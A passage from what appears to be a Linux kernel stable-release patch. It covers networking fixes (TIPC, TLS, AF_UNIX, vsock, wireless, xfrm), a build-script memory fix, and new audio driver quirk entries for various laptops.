+ 		udp_conf.use_udp_checksums = false;
+ 		ub->ifindex = dev->ifindex;
+-		if (tipc_mtu_bad(dev, sizeof(struct iphdr) +
+-				      sizeof(struct udphdr))) {
++		b->encap_hlen = sizeof(struct iphdr) + sizeof(struct udphdr);
++		if (tipc_mtu_bad(dev, b->encap_hlen)) {
+ 			err = -EINVAL;
+ 			goto err;
+ 		}
+@@ -760,6 +760,7 @@ static int tipc_udp_enable(struct net *net, struct tipc_bearer *b,
+ 		else
+ 			udp_conf.local_ip6 = local.ipv6;
+ 		ub->ifindex = dev->ifindex;
++		b->encap_hlen = sizeof(struct ipv6hdr) + sizeof(struct udphdr);
+ 		b->mtu = 1280;
+ #endif
+ 	} else {
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index b32c112984dd9..f2e7302a4d96b 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -111,7 +111,8 @@ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ 			break;
+ 		}
+ 
+-		if (sk_wait_event(sk, timeo, !sk->sk_write_pending, &wait))
++		if (sk_wait_event(sk, timeo,
++				  !READ_ONCE(sk->sk_write_pending), &wait))
+ 			break;
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d17601ceee79..70eb3bc67126d 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -602,7 +602,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	/* Clear state */
+ 	unix_state_lock(sk);
+ 	sock_orphan(sk);
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 	path	     = u->path;
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+@@ -627,7 +627,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 		if (sk->sk_type == SOCK_STREAM || sk->sk_type == SOCK_SEQPACKET) {
+ 			unix_state_lock(skpair);
+ 			/* No more writes */
+-			skpair->sk_shutdown = SHUTDOWN_MASK;
++			WRITE_ONCE(skpair->sk_shutdown, SHUTDOWN_MASK);
+ 			if (!skb_queue_empty(&sk->sk_receive_queue) || embrion)
+ 				skpair->sk_err = ECONNRESET;
+ 			unix_state_unlock(skpair);
+@@ -1441,7 +1441,7 @@ static long unix_wait_for_peer(struct sock *other, long timeo)
+ 
+ 	sched = !sock_flag(other, SOCK_DEAD) &&
+ 		!(other->sk_shutdown & RCV_SHUTDOWN) &&
+-		unix_recvq_full(other);
++		unix_recvq_full_lockless(other);
+ 
+ 	unix_state_unlock(other);
+ 
+@@ -3007,7 +3007,7 @@ static int unix_shutdown(struct socket *sock, int mode)
+ 	++mode;
+ 
+ 	unix_state_lock(sk);
+-	sk->sk_shutdown |= mode;
++	WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | mode);
+ 	other = unix_peer(sk);
+ 	if (other)
+ 		sock_hold(other);
+@@ -3027,7 +3027,7 @@ static int unix_shutdown(struct socket *sock, int mode)
+ 		if (mode&SEND_SHUTDOWN)
+ 			peer_mode |= RCV_SHUTDOWN;
+ 		unix_state_lock(other);
+-		other->sk_shutdown |= peer_mode;
++		WRITE_ONCE(other->sk_shutdown, other->sk_shutdown | peer_mode);
+ 		unix_state_unlock(other);
+ 		other->sk_state_change(other);
+ 		if (peer_mode == SHUTDOWN_MASK)
+@@ -3159,16 +3159,18 @@ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wa
+ {
+ 	struct sock *sk = sock->sk;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+ 	/* exceptional events? */
+ 	if (sk->sk_err)
+ 		mask |= EPOLLERR;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+ 
+ 	/* readable? */
+@@ -3202,18 +3204,20 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
+ 	struct sock *sk = sock->sk, *other;
+ 	unsigned int writable;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+ 	/* exceptional events? */
+ 	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+ 
+ 	/* readable? */
+diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
+index 884eca7f6743a..8360c790a8a01 100644
+--- a/net/vmw_vsock/af_vsock.c
++++ b/net/vmw_vsock/af_vsock.c
+@@ -1427,7 +1427,7 @@ static int vsock_connect(struct socket *sock, struct sockaddr *addr,
+ 			vsock_transport_cancel_pkt(vsk);
+ 			vsock_remove_connected(vsk);
+ 			goto out_wait;
+-		} else if (timeout == 0) {
++		} else if ((sk->sk_state != TCP_ESTABLISHED) && (timeout == 0)) {
+ 			err = -ETIMEDOUT;
+ 			sk->sk_state = TCP_CLOSE;
+ 			sock->state = SS_UNCONNECTED;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3d86482e83f51..6c2b73c0d36e8 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -5,7 +5,7 @@
+  * Copyright 2008 Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright 2016	Intel Deutschland GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+@@ -543,6 +543,10 @@ static int cfg80211_parse_ap_info(struct cfg80211_colocated_ap *entry,
+ 	/* skip the TBTT offset */
+ 	pos++;
+ 
++	/* ignore entries with invalid BSSID */
++	if (!is_valid_ether_addr(pos))
++		return -EINVAL;
++
+ 	memcpy(entry->bssid, pos, ETH_ALEN);
+ 	pos += ETH_ALEN;
+ 
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+index 94a3609548b11..5a67b120c4dbd 100644
+--- a/net/xfrm/xfrm_interface.c
++++ b/net/xfrm/xfrm_interface.c
+@@ -310,52 +310,6 @@ static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+ 	skb->mark = 0;
+ }
+ 
+-static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
+-		       int encap_type, unsigned short family)
+-{
+-	struct sec_path *sp;
+-
+-	sp = skb_sec_path(skb);
+-	if (sp && (sp->len || sp->olen) &&
+-	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
+-		goto discard;
+-
+-	XFRM_SPI_SKB_CB(skb)->family = family;
+-	if (family == AF_INET) {
+-		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
+-		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
+-	} else {
+-		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
+-		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
+-	}
+-
+-	return xfrm_input(skb, nexthdr, spi, encap_type);
+-discard:
+-	kfree_skb(skb);
+-	return 0;
+-}
+-
+-static int xfrmi4_rcv(struct sk_buff *skb)
+-{
+-	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
+-}
+-
+-static int xfrmi6_rcv(struct sk_buff *skb)
+-{
+-	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
+-			   0, 0, AF_INET6);
+-}
+-
+-static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+-{
+-	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
+-}
+-
+-static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+-{
+-	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
+-}
+-
+ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ {
+ 	const struct xfrm_mode *inner_mode;
+@@ -983,8 +937,8 @@ static struct pernet_operations xfrmi_net_ops = {
+ };
+ 
+ static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrmi6_rcv,
+-	.input_handler	=	xfrmi6_input,
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi6_err,
+ 	.priority	=	10,
+@@ -1034,8 +988,8 @@ static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+ #endif
+ 
+ static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrmi4_rcv,
+-	.input_handler	=	xfrmi4_input,
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi4_err,
+ 	.priority	=	10,
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 7f49dab3b6b59..bc04cb83215f9 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3637,12 +3637,6 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		}
+ 		xfrm_nr = ti;
+ 
+-		if (net->xfrm.policy_default[dir] == XFRM_USERPOLICY_BLOCK &&
+-		    !xfrm_nr) {
+-			XFRM_INC_STATS(net, LINUX_MIB_XFRMINNOSTATES);
+-			goto reject;
+-		}
+-
+ 		if (npols > 1) {
+ 			xfrm_tmpl_sort(stp, tpp, xfrm_nr, family);
+ 			tpp = stp;
+@@ -3670,9 +3664,6 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 			goto reject;
+ 		}
+ 
+-		if (if_id)
+-			secpath_reset(skb);
+-
+ 		xfrm_pols_put(pols, npols);
+ 		return 1;
+ 	}
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index 83f35ecacf24f..2d68a173b2273 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1743,7 +1743,7 @@ static void copy_templates(struct xfrm_policy *xp, struct xfrm_user_tmpl *ut,
+ }
+ 
+ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+-			 struct netlink_ext_ack *extack)
++			 int dir, struct netlink_ext_ack *extack)
+ {
+ 	u16 prev_family;
+ 	int i;
+@@ -1769,6 +1769,10 @@ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+ 		switch (ut[i].mode) {
+ 		case XFRM_MODE_TUNNEL:
+ 		case XFRM_MODE_BEET:
++			if (ut[i].optional && dir == XFRM_POLICY_OUT) {
++				NL_SET_ERR_MSG(extack, "Mode in optional template not allowed in outbound policy");
++				return -EINVAL;
++			}
+ 			break;
+ 		default:
+ 			if (ut[i].family != prev_family) {
+@@ -1806,7 +1810,7 @@ static int validate_tmpl(int nr, struct xfrm_user_tmpl *ut, u16 family,
+ }
+ 
+ static int copy_from_user_tmpl(struct xfrm_policy *pol, struct nlattr **attrs,
+-			       struct netlink_ext_ack *extack)
++			       int dir, struct netlink_ext_ack *extack)
+ {
+ 	struct nlattr *rt = attrs[XFRMA_TMPL];
+ 
+@@ -1817,7 +1821,7 @@ static int copy_from_user_tmpl(struct xfrm_policy *pol, struct nlattr **attrs,
+ 		int nr = nla_len(rt) / sizeof(*utmpl);
+ 		int err;
+ 
+-		err = validate_tmpl(nr, utmpl, pol->family, extack);
++		err = validate_tmpl(nr, utmpl, pol->family, dir, extack);
+ 		if (err)
+ 			return err;
+ 
+@@ -1894,7 +1898,7 @@ static struct xfrm_policy *xfrm_policy_construct(struct net *net,
+ 	if (err)
+ 		goto error;
+ 
+-	if (!(err = copy_from_user_tmpl(xp, attrs, extack)))
++	if (!(err = copy_from_user_tmpl(xp, attrs, p->dir, extack)))
+ 		err = copy_from_user_sec_ctx(xp, attrs);
+ 	if (err)
+ 		goto error;
+@@ -3443,7 +3447,7 @@ static struct xfrm_policy *xfrm_compile_policy(struct sock *sk, int opt,
+ 		return NULL;
+ 
+ 	nr = ((len - sizeof(*p)) / sizeof(*ut));
+-	if (validate_tmpl(nr, ut, p->sel.family, NULL))
++	if (validate_tmpl(nr, ut, p->sel.family, p->dir, NULL))
+ 		return NULL;
+ 
+ 	if (p->dir > XFRM_POLICY_OUT)
+diff --git a/samples/bpf/hbm.c b/samples/bpf/hbm.c
+index 516fbac28b716..7f89700a17b69 100644
+--- a/samples/bpf/hbm.c
++++ b/samples/bpf/hbm.c
+@@ -315,6 +315,7 @@ static int run_bpf_prog(char *prog, int cg_id)
+ 		fout = fopen(fname, "w");
+ 		fprintf(fout, "id:%d\n", cg_id);
+ 		fprintf(fout, "ERROR: Could not lookup queue_stats\n");
++		fclose(fout);
+ 	} else if (stats_flag && qstats.lastPacketTime >
+ 		   qstats.firstPacketTime) {
+ 		long long delta_us = (qstats.lastPacketTime -
+diff --git a/scripts/recordmcount.c b/scripts/recordmcount.c
+index cce12e1971d85..ec692af8ce9eb 100644
+--- a/scripts/recordmcount.c
++++ b/scripts/recordmcount.c
+@@ -102,6 +102,7 @@ static ssize_t uwrite(void const *const buf, size_t const count)
+ {
+ 	size_t cnt = count;
+ 	off_t idx = 0;
++	void *p = NULL;
+ 
+ 	file_updated = 1;
+ 
+@@ -109,7 +110,10 @@ static ssize_t uwrite(void const *const buf, size_t const count)
+ 		off_t aoffset = (file_ptr + count) - file_end;
+ 
+ 		if (aoffset > file_append_size) {
+-			file_append = realloc(file_append, aoffset);
++			p = realloc(file_append, aoffset);
++			if (!p)
++				free(file_append);
++			file_append = p;
+ 			file_append_size = aoffset;
+ 		}
+ 		if (!file_append) {
+diff --git a/sound/firewire/digi00x/digi00x-stream.c b/sound/firewire/digi00x/digi00x-stream.c
+index a15f55b0dce37..295163bb8abb6 100644
+--- a/sound/firewire/digi00x/digi00x-stream.c
++++ b/sound/firewire/digi00x/digi00x-stream.c
+@@ -259,8 +259,10 @@ int snd_dg00x_stream_init_duplex(struct snd_dg00x *dg00x)
+ 		return err;
+ 
+ 	err = init_stream(dg00x, &dg00x->tx_stream);
+-	if (err < 0)
++	if (err < 0) {
+ 		destroy_stream(dg00x, &dg00x->rx_stream);
++		return err;
++	}
+ 
+ 	err = amdtp_domain_init(&dg00x->domain);
+ 	if (err < 0) {
+diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c
+index fc114e5224806..dbf7aa88e0e31 100644
+--- a/sound/pci/hda/hda_generic.c
++++ b/sound/pci/hda/hda_generic.c
+@@ -1155,8 +1155,8 @@ static bool path_has_mixer(struct hda_codec *codec, int path_idx, int ctl_type)
+ 	return path && path->ctls[ctl_type];
+ }
+ 
+-static const char * const channel_name[4] = {
+-	"Front", "Surround", "CLFE", "Side"
++static const char * const channel_name[] = {
++	"Front", "Surround", "CLFE", "Side", "Back",
+ };
+ 
+ /* give some appropriate ctl name prefix for the given line out channel */
+@@ -1182,7 +1182,7 @@ static const char *get_line_out_pfx(struct hda_codec *codec, int ch,
+ 
+ 	/* multi-io channels */
+ 	if (ch >= cfg->line_outs)
+-		return channel_name[ch];
++		goto fixed_name;
+ 
+ 	switch (cfg->line_out_type) {
+ 	case AUTO_PIN_SPEAKER_OUT:
+@@ -1234,6 +1234,7 @@ static const char *get_line_out_pfx(struct hda_codec *codec, int ch,
+ 	if (cfg->line_outs == 1 && !spec->multi_ios)
+ 		return "Line Out";
+ 
++ fixed_name:
+ 	if (ch >= ARRAY_SIZE(channel_name)) {
+ 		snd_BUG();
+ 		return "PCM";
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 77a592f219472..881b2f3a1551f 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2528,6 +2528,9 @@ static const struct pci_device_id azx_ids[] = {
+ 	/* Meteorlake-P */
+ 	{ PCI_DEVICE(0x8086, 0x7e28),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
++	/* Lunarlake-P */
++	{ PCI_DEVICE(0x8086, 0xa828),
++	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
+ 	/* Broxton-P(Apollolake) */
+ 	{ PCI_DEVICE(0x8086, 0x5a98),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_BROXTON },
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 5c6980394dcec..be2c6cff77011 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4577,6 +4577,11 @@ HDA_CODEC_ENTRY(0x10de009d, "GPU 9d HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de009e, "GPU 9e HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de009f, "GPU 9f HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de00a0, "GPU a0 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a3, "GPU a3 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a4, "GPU a4 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a5, "GPU a5 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a6, "GPU a6 HDMI/DP",	patch_nvhdmi),
++HDA_CODEC_ENTRY(0x10de00a7, "GPU a7 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de8001, "MCP73 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x10de8067, "MCP67/68 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x11069f80, "VX900 HDMI/DP",	patch_via_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 172ffc2c332b7..c757607177368 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9363,7 +9363,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x802f, "HP Z240", ALC221_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x8077, "HP", ALC256_FIXUP_HP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x103c, 0x8158, "HP", ALC256_FIXUP_HP_HEADSET_MIC),
+-	SND_PCI_QUIRK(0x103c, 0x820d, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x820d, "HP Pavilion 15", ALC295_FIXUP_HP_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x8256, "HP", ALC221_FIXUP_HP_FRONT_MIC),
+ 	SND_PCI_QUIRK(0x103c, 0x827e, "HP x360", ALC295_FIXUP_HP_X360),
+ 	SND_PCI_QUIRK(0x103c, 0x827f, "HP x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+@@ -9458,7 +9458,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa8, "HP EliteBook 640 G9 (MB 8AA6)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aab, "HP EliteBook 650 G9 (MB 8AA9)", ALC236_FIXUP_HP_GPIO_LED),
+-	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9469,8 +9469,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b70, "HP EliteBook 835 G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b72, "HP EliteBook 845 G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b74, "HP EliteBook 845W G10", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x103c, 0x8b77, "HP ElieBook 865 G10", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9480,7 +9485,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c26, "HP HP EliteBook 800G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+@@ -9522,6 +9529,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1b13, "Asus U41SV", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1bbd, "ASUS Z550MA", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
++	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+@@ -9618,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x7716, "Clevo NS50PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x7717, "Clevo NS70PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x7718, "Clevo L140PU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x7724, "Clevo L140AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8228, "Clevo NR40BU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8520, "Clevo NH50D[CD]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x8521, "Clevo NH77D[CD]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -11663,6 +11672,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
+ 	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
++	SND_PCI_QUIRK(0x103c, 0x872b, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x885f, "HP 288 Pro G8", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0acdf0156f075..b9958e5553674 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -45,6 +45,13 @@ static struct snd_soc_card acp6x_card = {
+ };
+ 
+ static const struct dmi_system_id yc_acp_quirk_table[] = {
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Dell Inc."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5525"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -178,6 +185,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21EN"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -262,6 +276,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A42"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/fsl/fsl_micfil.c b/sound/soc/fsl/fsl_micfil.c
+index 4b8fe9b8be407..3a03f49452fa3 100644
+--- a/sound/soc/fsl/fsl_micfil.c
++++ b/sound/soc/fsl/fsl_micfil.c
+@@ -712,7 +712,7 @@ static int fsl_micfil_probe(struct platform_device *pdev)
+ 	ret = devm_snd_dmaengine_pcm_register(&pdev->dev, NULL, 0);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to pcm register\n");
+-		return ret;
